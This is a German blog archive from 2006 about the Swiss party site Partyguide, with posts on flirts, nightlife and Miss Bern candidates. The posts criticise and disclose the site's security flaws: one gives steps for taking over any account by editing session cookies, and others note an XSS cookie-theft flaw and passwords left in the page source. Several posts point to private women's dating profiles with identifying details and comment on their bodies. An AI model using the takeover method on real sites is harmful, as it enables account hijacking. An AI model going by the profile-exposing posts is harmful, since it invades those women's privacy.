Wow! Ich war baff. Da erinnerte sich also tatsächlich ein weibliches Geschöpf an meine Anwesenheit an einer Party und findet mich dann auch noch auf Partyguide (wie sie das bewerkstelligt hat, ist mir immer noch ein Rätsel). Die Ernüchterung kam postwendend auf meine Antwort:
böö ha ds gfüeu gha i heig di oscho gseh när isch mir i sinn cho dasi mau di profil uf partyguide ha agluegt.
ha di ja eigentlech nur wöue frage ob di kolleg wo geschter isch drbi gsi o bi partyguide registriert isch?
Quelle: Partyguide-Mitteilung von Sime4 an mad4you, 15:06 Uhr
Tjach. Also halt ;-) Jedenfalls hat sie jetzt Hebelis Nummer und E-Mail-Adresse. Dass er eine Freundin hat, habe ich dummerweise vergessen zu erwähnen ... *grins*
Checkliste
Als das kleine Techtelmechtel vorüber war, fiel mir noch ein Element ihres Profils auf:
humorvou, sarkastisch, intelligänt, charmant, spontan, erlech, treu, hesch niveau & bisch nid längwilig. söttsch nid lenger im bad ha, und bitte NID ängeri chleider trage aus ig
Quelle: myPage von Sime4
Schön und gut, dass die heutigen Frauen derart ausführliche und passgenaue Vorstellungen davon haben, was sie von einem Partner erwarten. Dennoch frage ich mich manchmal, ob es diese eierlegenden Wollmilchsäue wirklich auf dem Markt gibt? Sanft, sensibel, aber trotzdem - im richtigen Augenblick - ein Macho und harter Kerl. Ich glaube, dass die heutigen Frauenzeitschriften solches Checklisten-Gehabe noch weiter fördern. Ich befürchte einfach, dass gerade auf Grund solcher Anforderungsprofile manchmal ein guter Partner durch die Lappen gehen könnte.
Doch wie auch immer: Liebe Frauen, falls es diesen "perfekten" Mann wirklich gibt, erklärt mir mal, wieso er dann gerade ausgerechnet euch als Partnerin aussuchen sollte? Wenn er wirklich all diesen Anforderungen entspricht, müsste es sich hierbei um einen seeehr begehrten Zeitgenossen handeln ...
Zurechtrückens-Orgien
Beim pfingstlichen Abendessen erfuhr ich heute zudem von meinem Schwesterherz, dass momentan Oberteile en vogue sind, die weit über das Hinterteil getragen werden.
Wunderbar! Endlich! Wer dann und wann dem Nachtleben frönt, solle sich doch achten, wie oft Frauen an einem Abend folgende zwei Bewegungen ausführen:
- Vorbau kaschieren. Das Oberteil mit grossem Ausschnitt rutscht immer wieder ab, weshalb mann [sic!] die darunterliegende Unterwäsche erheischen könnte. Deshalb überprüft man alle fünf Minuten den Sitz des Tops und zieht es nach Bedarf nach oben ... Bis es wieder heruntergerutscht ist.
- Nieren verdecken. Eine ähnliche Bewegung findet auch reissenden Anklang bei den besseren Hälften: Das offensichtlich zu kurze Top zieht man ebenso regelmässig alle fünf Minuten Richtung Gesäss, um die Nieren zu verdecken.
Jeans hochziehen. Auch mit den Jeans ist es so eine Sache. Die letzten Jahre haben wir u.a. mit den Miss Sixty-Jeans erlebt, wie die Distanz zwischen Bauch- und Beinansatz kontinuerlich zusammenschrumpfte. Nennen tut man dies "low waist" oder "low cut". Dies führt dazu, dass die Welt im Frauenrücken bei kleinsten Bück-Bewegungen freie Sicht auf den Slip - meist Tanga/G-String - hat. Da die Hosen auch sonst oft herunterzurutschen scheinen, bemüht man sich auch hier alle paar Minuten, die Hose auf ein sittliches Niveau hochzuziehen.
Ein Blogger aus dem Vereinigten Königreich hat ähnliche Erfahrungen gemacht:
She didn’t seem the type to show off her breast cleavage, but was happy to expose her buttocks in full. That wouldn’t have been so bad, but she had the tattiest pink thong on. We agreed that we’d never wear low cut jeans.
But there’s no turning back the tide of fashion. [...] Needless to say, I now need to ensure my underpants are suitable for public display.
Quelle: Low cut jeans… enough’s enough
Für mich sind das ernsthafte Anzeichen eines grossen Widerspruchs, eines Paradoxons: Die von der Modeindustrie und der Umwelt vorgelebte Kleidungsregeln werden zwar bereitwillig adaptiert, dennoch scheint man im Innersten doch unwohl zu sein, zu viel Haut zu zeigen, was ich auf die Erziehung zurückführe. Wird sich Frau irgendeinmal mit beiden Anforderungen arrangieren können?
Mein Rat: Um Himmelswillen, habt ihr zuwenig Geld, weshalb ihr euch nur zu knappe/einige Nummer zu kleine Kleidungsstücke kaufen könnt?
Labels: Partyguide
Dienstag, Mai 30, 2006
Der zweite Partyguide-Hack
Die armen Jungs kommen nicht zur Ruh. Schon wieder ist eine ober-peinliche Schwachstelle auf dieser Web-Community an die Oberfläche des Webs geschwappt:
Unter PartyGuide.ch ist es möglich Profile von anderen Users zu betrachten. Vorausgesetzt wird, dass man einen gültigen Account besitzt und eingeloggt ist.
Quelle: PartyGuide.ch - XSS Vulnerabilities [Sicherheitslücke - Exploit]
Diese "Vulnerability" ist aber bedeutend weniger gefährlich als der vor einigen Wochen von mir publizierte (aber nicht von mir entdeckte) Hack, da es sich hierbei "nur" um eine Cross-Scripting-Attacke handelt. Ich muss dazu mein Opfer gezielt auf einen Link klicken lassen, um an dessen Cookie-Daten zu gelangen. Da Partyguide aus einigen der auf think eMeidi publizierten Fehlern gelernt hat, kriegt der Angreifer zumindest das Passwort nicht im Klartext zu sehen.
Peinlich: Die Scripts der PHP-Bastler bei Partyguide sind anfällig auf Query-String-Injections (diesen Begriff habe ich kurzerhand selbst erfunden - SQL-Injections waren mir bisher bekannt). Die Partyguide-Codebasis wäre mir bei einer feindlichen Übernahme keinen Fünfer wert ...
Dank: Anonymer Tippgeber
Labels: Partyguide
Sonntag, April 23, 2006
Partyguide goes AJAX
Nachtrag: Da lobt man Partyguide ausserordentlicher Weise für einmal, und eine Stunde später so was ... *tz*
Nachdem es eMeidi.com vorgemacht hatte, beschreitet nun auch meine Lieblings-Party-Site Partyguide den "asynchronen JavaScript/XML-Weg". Entdeckt habe ich die Neuerung letzte Woche:
Die Frischzellenkur tut gut - dies hängt sehr wahrscheinlich mit einem neu zum Team hinzugestossen Entwickler zusammen (unbestätigter Rumor).
Vorteile von AJAX
Anstelle also bei einer Suche gleich den ganzen Inhalts des Frames neu zu laden, beschränkt man sich neuerdings darauf, nur noch den dynamisch-variablen Teil, die Tabelle mit den Suchresultaten, gemäss den Such-Parametern auszuwechseln.
Endlich bleiben die Suchparameter also im Formular stehen! Ich hatte mich bisher immer grün und blau geärgert, dass ich die Suchparameter bei jeder Suche wieder von vorne eingeben musste. Manchmal möchte man die bestehenden Angaben ja beibehalten, und nur eine Option (z.B. "Nur User mit Foto anzeigen" aktivieren resp. deaktiveren).
Leider, leider hat man meinen Ratschlag vom Dezember 2005 immer noch nicht beherzigt: Damals schlug ich vor "Sich wiederholenden HTML-Code [zu] vereinfachen". Nichts ist seit her geschehen.
Die von user.php zurückgegebene JavaScript-Variable enthält immer noch die fürchterliche, zig-fach redundante HTML-Tabelle. Mit einem wenig Bytes grossen CSS-File zur Formatierung der Tabelle könnte die grösse der AJAX-Antwort drastisch reduziert werden ...
Schade übrigens, dass HTML-Code zurückgeliefert wird. XML hätte mir besser gefallen, denn dann hätte ich mir eine auf meinem Server laufende Suchfunktion gebastelt - mit schickem HTML/CSS. Bis zur Partyguide-API ist es wohl aber noch ein weiter Weg.
Framework
Das im Einsatz stehende JavaScript-Framework stammt von Modern Method und nennt sich Simple AJAX Toolkit. Auf eMeidi.com habe ich dagegen Prototype im Einsatz. Was besser ist? Keine Ahnung. Hauptsache, es funktioniert.
Nachteil von AJAX
Der Nachteil des momentanen AJAX-Booms: Die Libraries sind sehr umfangreich, Prototype bspw. knapp 50KB. Dies macht sich deutlich bemerkbar, wenn die Site mit einer langsamen Verbindung abgerufen wird. Aber auch schnellere Leitungen bringen nicht viel, da die Browser den Code auch noch interpretieren müssen. Kaum verwunderlich, dass Sites wie Digg (49 Page-Requisites, darunter 7 JavaScript-Dateien, die je über 10KB wiegen) oder Flickr (40 Page-Requisites, darunter zwei JavaScript-Files mit 32.6KB und 28.8KB, aber auch ein 60KB (!) grosses CSS-File) beim ersten Aufruf eine deutliche Ladeverzögerung aufweisen.
Partyguide-Implementation
Wieso der Entwickler von Partyguide den JavaScript-Code direkt in das HTML/PHP-File eingefügt hat, verstehe ich nicht.
Auch beim Konkurrenten tilllate findet man immer wieder CSS-Styles, die nicht über ein globales CSS-File includiert werden, sondern direkt im HTML-Quelltext stehen.
Würden diese Angaben konsequent in eigenständige Dateien ausgelagert, könnten diese lokal oder auf dem zwischengeschalteten Proxy gecached werden und müssten nicht jedes mal neu Übertragen werden (Stichwort: HTTP 304). Aber anscheinend ist das Transfervolumen nebensächlich.
Weitere Verbesserungen bei PG
Übrigens: Auch die in Partyguide - ach Wunder - lahmt kritisierte Ladeverzögerung an Sonntagen gehört der Vergangenheit an. Nur wenige Tage nach meiner Kritik hat man einen neuen, professionellen Load-Balancer (Hersteller unbekannt) installiert, der die fehleranfällige und langsame Apache/mod_proxy-Lösung ablöste. Nun lädt die Page auch flott bei über 4000 gleichzeitigen Besuchern.
Weiterführende Links
(Fast) alle auf think eMeidi erschienene Artikel über Partyguide.
Labels: Partyguide
Freitag, April 14, 2006
Erste Osternacht in Kopenhagen
Der Osterausflug 2006 hat mich und die Kollegen Ritz, Sedlacek und Zgraggen vorgestern Mittwoch nach Hamburg und anschliessend am Donnerstag nach Kopenhagen geführt, wo wir nun bis Sonntag verweilen werden.
Gegen neun Uhr Abend trafen wir mit unserem Mietauto nach einer Überfahrt mit der Fähre in Kopenhagen (Kobenhavn) an. Das Appartment im Quartier Vesterbro ist umwerfend gross und luxuriös eingerichtet. Sogar einen Internet-Anschluss (inkl. Ethernet-Kabel *smile*) findet sich in der Wohnung im ehemaligen Arbeiter- und heutigen Trend-Quartier wieder.
Unerlässlich: Wo läuft was?
Da ich - aus früheren Unterlassungen mittlerweile klug - bereits zu Hause nach geeigneten Party-Locations umgesehen habe, kam ich schnell einmal auf die Party-Site Denmarkbynight (DKBN), einer dänischen Version von Partyguide.
Get in contact!
Eine dort angekündigte Party des Club S, auf Donnerstag-Abend angesetzt, erregte meine Aufmerksamkeit. Das Problem: Es handelt sich hierbei um einen "Memberclub" (was auch das immer in Dänemark bedeutet). Auf den Touri-Bonus tippend, verfasste ich am Montag-Abend ein kurzes Mail an die auf der Web-Site des Clubs angegebene Adresse. Ich fragte darin an, was ich unternehmen müsse, um Mitglied zu werden. Siehe da, bereits am Dienstag-Mittag erreichte mich Daniels Antwort, in der er mir mitteilte, dass er mich auf die "Liste" gesetzt hätte. Das Mail druckte ich aus und legte es zum Gepäck.
Energiezufuhr und Anfahrt
Nachdem wir in der Nähe unseres Appartments pakistanisch gespiesen und uns danach noch einmal ins Appartment zurückgezogen hatten, um uns schön zu machen, ging es ab in die Innenstadt. Dank Vorarbeiten mit Google Earth sowie dem dänischen map.search.ch-Pendant Krak.dk hatte ich mir eine Karte der wichtigsten Party-Locations in Sack. Da das Navigationssystem des 5ers kläglich versagte, mussten wir uns auf das ausgedruckte Kartenmaterial von Google Earth verlassen. Dieses war aber derart akkurat, dass wir keine Probleme hatten, in die Umgebung des Clubs zu gelangen.
Die Menschenmenge
Der Club S befindet sich in einer Seitenstrasse - als wir um die Hausecke traten, traf uns fast der Schlag: Eine riesige Menschenmenge bevölkerte die Hälfte der Strasse und schien geduldig auf Einlass in einen Club zu warten. Als wir näher kamen realisierten wir, dass sich hier nur die Schönsten der Schönen tummelten. Unglaublich viele hübsche Gesichter, seien es Frauen wie Männer. Doch nirgends stand etwas von Club S - an den am Gebäude angebrachten Schildern lasen wir Luux Copenhagen. War das der Club S? Wieso hiess er anders als auf der Web-Site?
Die Gedenkstunde
Wir entschieden uns, mal kurz im Quartier herumzuspazieren und abzuklären, ob der Club in einer anderen Seitenstrasse angesiedelt war. Wir fanden - nichts. Nach einem kurzen Ölhalt (Öl = dän. Bier) im nahe gelgenen7 Eleven-Store schlossen wir uns an das Ende der Schlange an.
Anstehen bei den Augenweiden
Eineinhalb Stunden lang sollten wir uns inmitten von urkomisch sprechenden Menschen verbringen, bis uns der Türsteher musterte. Wie kaum jemals verging die Wartezeit im Flug - ungläubig wurden wir Zeugen der wohl wochenendlichen Szenerie von heranfahrenden Taxis und daraus aussteigenden Schönheiten (und vielen Metrosexuellen). Trotz Temperaturen knapp um den Gefrierpunkt herum sah das Standard-Outfit der weiblichen Geschöpfe aus, als würde Hochsommer herrschen: Röckchen, kaum Nylons und offene Stöckelschuhe. Dass manche in der Warterei (und Sauferei - ich glaube, die Frauen dort haben echte Alkoholprobleme) ab und zu einen Fuss voll aus den vielen Regenpfützen herauszogen, gehört wohl zum Ritual. Niemand schien sich gross darüber aufzuregen. Meine Füsse - umhüllt von Sockend und Lederschuhen waren nach einer Stunde in der Kälte total kalt. Wie die Frauen diese Tortur überleben, ist mir immer noch ein Rätsel.
Mit der Gewissheit, dass es sich bei den hier anwesenden Personen definitiv um keine repräsentative Stichprobe handelt, muss ich unserem Appartment-Vermieter beipflichten: "Oh, and we have very nice girls". Schlank, oftmals blond, modisch und aufreizend gekleidet, alle geschminkt. Hübsche Gesichter - skandinavisch halt. Für Schweizer aus der bernischen Provinz definitiv ein Aha-Erlebniss (wobei wohl auch Zürich den Kürzeren ziehen würde, das ist gewiss).
Schattenseiten
Ich persönlich vermute aber, dass sich die Ladies durch den anhaltend grossen Konkurrenzdruck selber ein Ei gelegt haben. Dies führt zu einer positiven Rückkoppelung, also verstärktem Wettbewerb und Verdrängungskampf, den Neoliberale ja gerne als Urquell der westlichen Erneuerung sehen. Ein Kollege bemerkte süffisant, dass das im europäischen Vergleich vorbildliche Wirtschaftswachstum wohl durch enorme Umsatzzahlen in Mode-Shops, Kosmetik, Mani- und Pediküre und von Friseur-Läden stamme. Fitness-Center dürften auch dazu gezählt werden ...
Nachtrag: Natürlich profitiert auch die nachgelagerte Industrie von den Rückkoppelungen. Man denke nur an die Podologen, die durch exzessives Stöckelschuh-Tragen verformte Fusspartien der Däninen "reparieren" müssen. Oder die Psychologie, die sich derjenigen Fälle annehmen muss, die sich nicht in das hohe Niveau einfügen können/wollen.
Die entscheidende Minute
Nach 1.5h Warterei kriegten wir also unsere Chance beim Türsteher. Die Situation verschlechterte sich innert Sekunden rasch - er sprach auf mein Bitten hin zwar englisch, wollte aber nichts von einem "Memberclub S" wissen. Ich zog das vorsorglich mitgebrachte Mail aus der Tasche. Er las Daniels Zeilen, schüttelte aber den Kopf. Kurz bevor er mir den Zettel zurückgab, erblickte er aber den Absender. Seine Miene heiterte sich schlagartig auf, und drin waren wir. "Sesam, öffne dich!" auf dänisch? Die Dummen haben wohl auch manchmal Glück.
Hard Facts & Ambiente
Eintritt: 60DKK (12 SFr.). Garderobe: 20DKK (4 SFr.). Vodka Red Bull: 35DKK (7 SFr.). Cola: 15DKK (3 Fr.). Offiziell geöffnet bis 5 Uhr morgens (die Musik spielte aber bis etwa 5.30 Uhr weiter). Hochstehender DJ, spezieller Musikstil (House und Hip-Hop, gegen Ende noch eine 90er-Revival-Runde mit Culture Beat, Sash (Ecuador und Encore une fois u.a.). Besucher: Vorwiegend Dänen, wir haben auch zwei Deutsche "gehört". Auch einige dunkelhäutige (z.B. pakistanischer Abstammung).
Die Bilder
Labels: Partyguide
Dienstag, April 04, 2006
cand. miss. bern.
Fotos auf Lautundspitz über das Miss Bern Training
Ich befürchte, dass man da auch mit viel, viel Training nichts besseres hinbekommt ...
Root in the Bumb
Kommentar einer Chat-Bekanntschaft aus Brasilien, zur Zeit in AUS:
look a[t] her" being root in the bumb" face
Was der Ausdruck sagen will, verschieben wir aus Gründen des Jugendschutzes auf nach 23.00 Uhr.
Nachtrag: Kandidatin I mit einem Partyguide-Profil (Referer ausschalten oder Link in neues Browser-Fenster kopieren, denn "PG is evil" und erlaubt keine Verweise von fremden Seiten). Jg. 1985, aus Burgdorf, Mathematik-Studentin (Chapeau!) und - gemäss den Flirt-Angaben auf PG - noch zu haben.
Lokales
Ha! Thörishaus ist auch prominent vertreten!
Nachtrag: Kandidatin II mit einem Partyguide-Profil (Referer ausschalten oder Link in neues Browser-Fenster kopieren, denn "PG is evil" und erlaubt keine Verweise von fremden Seiten). Jg. 1987, (wie erwähnt) aus Thörishaus, Beruf unbekannt und mit Blick auf die hochgeladenen Bilder vergeben.
Favoritin
Etwas zu dünn zwar (Nachtrag: Je mehr ich die Dame blicke, umso dünner kommt sie mir vor - ist das gesund?!), aber ein hübsches Gesicht. Mit Schoggi erreicht man da sicher schnell Kampfgewicht :-)
Labels: Partyguide
Donnerstag, März 23, 2006
Party-Photographen abwerben?
Eigentlich freuen wir uns ja über Mitbewerber, oder solche welche es gerne sein würden. Sie spornen uns an, noch besser zu werden und hart für unsere treuen Lautundspitz Fans zu arbeiten! Doch wenn ein "Filmlidrüller" plötzlich auf die Idee kommt, kurzerhand einfach alle unsere Fotografen anzuschreiben und versucht abzuwerben, dann finden wir das nicht nur ethisch bedenklich, sondern, da er das ganze noch über Lautundspitz.ch gemacht hat, einfach nur noch dämlich!
Quelle: Lautundspitz Newsletter 12/2006, 23. März 2006.
Sorry, wenn es wieder einmal so weit ist: Da stecken doch nicht etwa die von Partyguide dahinter, oder?
Sobald ich von Lautundspitz mehr über diese Story erfahre, poste ich meine Erkenntnisse hier.
Nachtrag: Doch nicht. Das kommt halt davon, wenn man den PG-Reflex schon fest einprogrammiert hat. In Tat und Wahrheit war es ein findiger Kopf von Videooo.ch:
Video ist keine Konkurrenz zu Partyfotos, sondern ein neues, spannendes Medium. Wir suchen dringend Leute, die Lust haben, hin und wieder auch mit einer Profi-Videoausrüstung aus Zürich, Bern, Basel, Luzern oder der Ostschweiz von der Partyszene zu berichten. Falls Du jemanden kennst, der sich für Video interessiert, freue ich mich über ein Mail an team@videooo.ch Bernhard Seiffert, Gesamtleitung videooo.ch
Quelle: Mail von Saxer an Mario Aeby, 23. März 2006.
Jungs, sorry, aber das will kein Mensch. Es gibt zwar auch Videodokumente von eMeidi ausser Rand und Band - aber daraus gleich einen abendfüllenden Spielfilm zu produzieren? Näää. Mal schauen, ob sich das Konzept - analog zu Handy-TV - dennoch durchsetzen wird ...
Demnächst in einem Kino in Ihrer Nähe:
Foto-Wars!
Wie kürzlich ein unerkannt bleibender Kenner der Party-Photographen-Szene süffisant im Gespräch mit bemerkte:
Wenn 50% unserer Photographen nicht mal ihre Kameras bedienen können, wie sollen Sie je von RSS gehört haben?
Dennoch: Ist das Party-Photographen-Handwerk derart kompliziert, dass man nicht etwa neue Leute mit ihrem Aldi-Kompaktkameras anwirbt (O-Ton: Blitz? Für was brauch' ich mitten in der Nacht einen Blitz?), sondern der Konkurrenz die Leute "abzugrasen" versucht?
Komische Welt ... *kopfschüttel*
Labels: Partyguide
Sonntag, März 19, 2006
Partyguide - ach Wunder - lahmt
Sonntag-Abend. Die gesamte Schweizer Partyszene versammelt sich auf ihren bevorzugten Party-Portalen und schaut sich die digitalen Schnappschüsse des gestrigen Abends an.
Alle Partygänger? Nein, leider nicht alle. Benutzer von Partyguide sind sich daran gewöhnt, statt Bildern zuerst einmal gaaanz lange nichts zu sehen. Ist es nicht erstaunlich, wie sich dieses Spiel von Sonntag zu Sonntag wiederholt und die Benutzer anscheinend immer wieder zurückkehren? Ausdauer scheint eine positive Eigenschaft des durchschnittlichen Partyguide-Fanboys zu sein ...
Ein Test von heute Sonntag, 19. März 2006, 19:44 Uhr zeigt: Um von der Startseite auf die Informationsseite des Events This is it! @ Eclipse Bar, Bern zu gelangen, benötigt der ausdauernde Partyguide-Surfer 72.294 Sekunden (gemessen mit der Firefox-Extension Fasterfox).
Mehr als eine Minute vergeht also, bis eine neue Seite geladen ist. Gemäss dem WEMF-Rating sei Partyguide diejenige (von WEMF beglaubigte) Web-Site der Schweiz, auf der die Benutzer am Längsten verweilen. 20 Minuten im Schnitt. Gemäss Adam Riese macht dies an einem Sonntag wie diesem sagenhafte 20 Seiten, die sich ein Benutzer anschaut. Fast wie damals, als man noch mit einem 56k-Modem unterwegs war ...
Labels: Partyguide
Donnerstag, März 16, 2006
Session-Handling auf Party-Sites
Als Hilfe für die Partyguide-Sicherungsspezialisten hier ein kleiner Überblick, wie es die anderen Schweizer Party-Sites denn so machen:
Partyguide
Hier bereits zu Genüge diskutiert:
- PHPSESSID: Eindeutige ID der Session
- c_ip: IP-Adresse des Benutzers
- c_plz: Postleitzahl
- sess_psw: Passwort
- sess_member_id: Benutzer-ID
- sess_login: Benutzernamen
Vor noch nicht allzulanger Zeit hatte man in den Cookies auch noch das Geschlecht, das Geburtsdatum und den Kanton gespeichert. Aus "Performance-Gründen", wie man mir gesagt hat. Wieso speichert man das nicht in die Session?! Wurde jetzt wohl auch als bessere Lösung entdeckt.
Tilllate
Kurzkritik: Fürchterliches Design, Urgestein der Party-Sites, gesponsert von Sony, in Zürich weit verbreitet, kürzlich Medienpräsenz bei Schweiz Aktuell.
Session-Variablen:
- tilllateAutoLogin: Ein 56-Zeichen langer String, urlcodiert, der bei mir neben Buchstaben und Zahlen auf ein /, + und zwei == enthält. Ich werde nicht ganz schlau daraus. Ob die Sonderzeichen benutzt werden, um Hashes von Userid und Passwort voneinander zu separieren?
- tlsid: Die eigentliche ID, um den User während seiner Sitzung zu identifizieren (verfällt am Ende der Session).
Die anderen zwei Cookies, track_cookie und tilllate_stat2, dienen meiner Vermutung nach dazu, das Benutzerverhalten für Werbezwecke aufzuzeichnen. Sie laufen erst im 2007 resp. 2008 ab.
Usgang.ch
Kurzkritik: Sehr frisches und ansprechendes Design (IMHO das beste hier in der Schweizer Szene), Ursprünglich Schwerpunkt auf Zürich, danach Expansion, deshalb Unterteilung in Regionalsites (guter Ansatz!), grösste und schärfste Fotos im Vergleich zu den anderen Anbieter (bezogen auf Fokus, nicht die Frauen! *grins*). Sponsor: Canon, wohl als Gegenpol zu Sonys tilllate.
Session-Variablen:
- PHPSESSIONID: Nach dem Login wird der User durch diesen 32 Zeichen langen String identifiziert.
- cautologin: Enthält den Usernamen und den MD5-Hash des Passwortes, getrennt mit einem Komma.
Lautundspitz
Kurzkritik: Ansprechendes Design, zusammen mit Usgang.ch deutlich vor Tilllate und Partyguide, ursprünglich auf Nord- und Ostschweiz beschränkt, nun 7 Regionen.
Session-Variablen:
- PHPSESSID: Nach dem Login wird der User durch diesen 32 Zeichen langen String identifiziert.
- lus_last_visit: Unixtime des letzten Logins - falls dies beim nächsten Autologin wirklich auch beachtet wird (indem man auf dem Server dieselbe Unixtime auch in die Datenbank speichert) - Chapeau. Sehr gute Idee, wieder etwas gelernt.
- lus_access: 20 Zeichen langer String. Evtl. Zusammenfassung von Usernamen und Passwort? Müsste näher erforscht werden.
Man bemerke den Unterschied des Variablen-Namens im Vergleich zu Usgang.ch - PHPSESSID ist der Default-Name von PHP.
Ferner liefen ...
- Lidahun.ch für Deutsch-Fribourg
- Partyzone24 im Raume Bern (?)
Kennt noch jemand mehr Nischen-Seiten?
Fazit
Partyguide, wie ihr seht ist kein Entwickler der anderen Communities auf die Idee gekommen, das Passwort im Klartext in ein Cookie zu speichern und es bei jedem Zugriff zu übermitteln. Aus gutem Grund - als PHP-Profi macht man das einfach nicht.
Nebenbei ist es natürlich interessant, das Schicksal der Communities weiter zu verfolgen. Gibt es einen Markt für vier grosse Sites? Wird es vielleicht gar einmal Fusionen geben? Können die Produkte längerfristig Geld generieren? Wird es bald ein zweigeteiltes Modell geben, bei dem der Benutzer für Zusatzfunktionen bezahlen muss? (In Skandinavien bereits der Fall). Sehr spannende Fragen. Ich bleibe dran :-)
Labels: Partyguide
Mittwoch, März 15, 2006
Der Partyguide-Hack
Partyguide, die Web-Site mit der "grössten Verweilzeit der Schweiz", ist ja im Laufe meiner kurzen Blog-Karriere so etwas wie mein Steckenpferd geworden. Leute, die sich meine sprachlichen Ergüsse zu Gemüte führen, wissen dies ja bereits längst - und fragen desöfteren, was der Antrieb dahinter ist. Meine Antwort: Kampagnenjournalismus à la Blick. Man beisst sich, einem Rottweiler gleich, in ein Thema fest und lässt nicht mehr los. So füllt man eine Zeitung, deren Titelblatt und die Schlagzeilenaushänge während einer ganzen Woche. Ich habe an dieser Form der Informationsvermittlung Freude gefunden, möchte mich aber hier wieder einmal bei den Machern von Partyguide höchstpersönlich bedanken - sie sind es nämlich, die (unter anderem) den "täglichen" Stoff für dieses Blog liefern.
In unzähligen Artikeln bin ich über die mangelhafte Umsetzung der genialen Idee "Partyföttelis im Internet" hergezogen. Selten hat sich etwas zum Guten gewendet, und wenn dann, betrafe es nur kleine Details. ohne dass sich gross etwas geändert hätte. Immerhin habe ich kürzlich herausgefunden, das Mitglieder der "Partyguide-Familie" mein Blog frequentieren und ihren Senf dazugeben.
Doch nun ist der Zeitpunkt gekommen, wo es nicht mehr um schlechtes HTML oder überlastete Server geht. Nun wird es ernst. Sehr ernst. Und für einige verantwortlungslose Möchtegern-PHP-Entwickler sehr peinlich und brenzlig.
Die Anklage
Bis letzten Montag-Abend standen bei Partyguide persönliche Daten von 190'000 Accounts sperrangelweit offen. Mit dem Know-How eines Script-Kiddies konnte sich jedermann Zugang zu Namen, Postanschriften, Mobiltelefonnummern und sogar Passwörtern aller Partyguide-Benutzer machen. Hinzu kamen die persönlichen Nachrichten, die zwischen Mitgliedern der Community ausgetauscht wurden. Die Ausrufezeichen erübrigen sich wohl bei einer solchen Aussage.
Der "Hack"
Ich schreibe das Wort "Hack" deshalb in Anführungszeichen, weil das Vorgehen derart trivial ist, dass es aus meiner Sicht kaum mehr als Hack durchgeht. Nein, ein Schelm würde wohl gar behaupten, dass es die PHP-Entwickler bei Partyguide geradezu herausgefordert haben - den Schlüssel sozusagen im Schloss der Villa stecken liessen und sich mit dem Fotoapparat bewaffnet in das Nachtleben das Samstag-Abends eintauchten.
Voraussetzungen
- gültiger Partyguide-Account (in 5 Minuten mit komplett falschen Angaben eingerichtet)
- Mozilla Firefox 1.5
- Extension Add N Edit Cookies
- Minimale Kenntnisse von HTTP, Cookies und PHP
Wer obige "Zutatenliste" liest und etwas vom Web vermutet wohl schon, wo der Angriffspunkt lag. Richtig - man loggte sich mit dem eigenen Account ein. War man "drin", veränderte man zwei (der vielen) Cookie-Werte:
- sess_login
- sess_member_id
sess_login entspricht dem zu "kapernden" Benutzernamen, sess_member_id der Benutzer-ID. Beides konnte man für jeden beliebigen Benutzer über die Community-Such-Funktion in weniger als einer Minute ausfindig machen.
Zusätzlich - und das verstehe ich bis heute noch nicht - musste man noch das PHPSESSID-Cookie löschen. Erst jetzt funktionierte die Übernahme eines fremden Accounts. Beim nächsten Request an den Server schlüpfte man in die Rolle des ausgesuchten Opfers.
Ich kann mir dieses Verhalten im Grund nur so erklären, als dass auf dem Server eine Session-Variable $bolLoggedIn lag, die bestätigte, dass sich der Sender der Cookies bereits eingeloggt hatte. Nach meinem Kenntnisstand wird die Session-Variable aber eben gerade demjenigen User zugeordnet, der die entsprechende PHPSESSID mitschickt ... Anyone? chregu als PHP-Entwickler vielleicht?
Obwohl als Cookie auch sess_psw mitgeschickt wurde, "vergass" man anscheinend, dieses auszuwerten. Galt jemand erst einmal als authentifiziert, konnte er sich nach vergnügen andere Identitäten überstülpen. Eine Fährlässigkeit sondergleichen!
Der grösste Fehler, welcher übrigens immer noch nicht gefixt ist, ist aus meiner Sicht aber die Preisgabe des Benutzerpasswortes im HTML-Quelltext. Auf der Seite "my Settings" gibt es ein Passwort-Feld, das mit dem Passwort aus der Benutzerdatenbank gespiesen wird. Da das input-Feld den Typ password trägt, offenbart sich dem Benutzer (auf den ersten Blick) aber nur einige Sternchen. Wenn man sich aber die Mühe machte, den Quelltext zu Rate zu ziehen, las man da:
... type="password" name="passwort_neu" value="supersicherespasswort" size="20" maxlength="50" ...
Im Browser gerendert also etwa so:
Fantastisch, Jungs! Der branchenübliche Standard sieht anders aus (man beachte die leeren Felder, die alle drei vom Benutzer selber gefüllt werden müssen):
Nicht nur Windows-Benutzer werden dieses Schema zu genüge kennen (Ctrl-Alt-Del - "Kennwort ändern") - es hat sich in der IT-Industrie überall eingebürgert.
Wie lange schon?
Aufmerksam auf den "Hack" wurde ich - erstaunlicherweise, kann man sagen - nicht aus eigenem Antrieb. Sondern durch einen anonymen Tippgeber - ihm gebührt also die "Ehre", der eigentliche Entdecker der Lücke zu sein. Ohne dessen Hinweis, der Aufgrund meiner im Netz publizierten Partyguide-Zerrisse den Weg zu mir fand, wäre ich nie auf die Idee gekommen, aktiv nach Löchern zu suchen. Dank gebührt natürlich auch dem Authentifizierungs-Spezialisten bei PG, der mich nicht lange auf die Folter spannen liess. Viel länger hätte ich mir nämlich nicht die Zähne ausgebissen.
Es darf aufgrund der Art des Hinweises angenommen werden, dass das Wissen um diese Sicherheitslücke wohl kurz auf dem Weg dazu war, "eidgenössisches Allgemeingut" zu werden. Ich kann mir gut vorstellen, dass die "Neuigkeit" in der Computer-Szene gerade begann, seine Kreise zu ziehen.
Wie lange die Sicherheitslücke aber bereits bestand, weiss niemand. Wohl nicht mal die Entwickler selber. Das Absichern ihres Produkts stand, wie vom Tippgeber süffisant vermutet, wohl auf Seite 200 ihrer "To-Do"-Liste.
Funkstille
Bis heute wurde kein einziges Mitglied der Community informiert, dass seine persönlichen Daten gefährdet waren. Man will sich ja nicht blossstellen. Der Fakt, dass auch die Passwörter frei zugänglich waren, würde mich aber erschaudern lassen. Wieviele KV-Stifte, die Partyguide von morgens bis abends im Büro geöffnet haben, verwenden für den Firmenrechner dasselbe Passwort? Oder für ihre E-Mail-Accounts? Abgründe tun sich auf ...
Nie wieder!
Ich überlege mir, in der Blogosphäre eine Sammelaktion zu starten und mit dem gesammelten Geld dem Partyguide-Team das Buch Essential PHP Security zuzusenden. Ohne Gebete nützt das Buch alleine wohl nichts. Wenn solchen Leuten PHP und ein Server in die Hand gedrückt wird, verwandeln sie dieses in wenigen Minuten zu einer tödlichen Waffe.
Dilettanten
